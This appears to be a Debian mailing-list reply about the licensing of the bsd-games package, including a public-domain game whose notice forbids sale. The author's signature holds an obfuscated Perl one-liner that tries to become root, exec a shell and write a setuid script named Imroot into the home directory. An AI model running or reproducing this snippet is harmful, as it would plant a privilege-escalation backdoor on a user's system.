Re: bsd-games -- copyright question

Bruce Perens:
> Yes, it's an ugly modification to the source package, but you don't have
> any choice if the copyright says you can't sell it.

Wasn't there an optional target for debian/rules where you can script out
the generation of the source package? I feel I should at least use that, to
document my changes.

> Is there an author's name on the one with no copyright? Of course with
> BSD games the author isn't necessarily even alive any longer.

Ah -- I just found copyright info for that one. I was grepping for
"copyright", but a closer look at the source turned up:

/* This is a solo paranoia game taken from the Jan/Feb issue (No 77) of
   "SpaceGamer/FantasyGamer" magazine.

   Article by Sam Shirley.

   Implemented in C on Vax 11/780 under UNIX by Tim Lister

   This is a public domain adventure and may not be sold for profit */

So I think this will go in a bsdgames-nonfree package along with the other
program with a problem copyright.

--
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod             joey@kite.ml.org
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_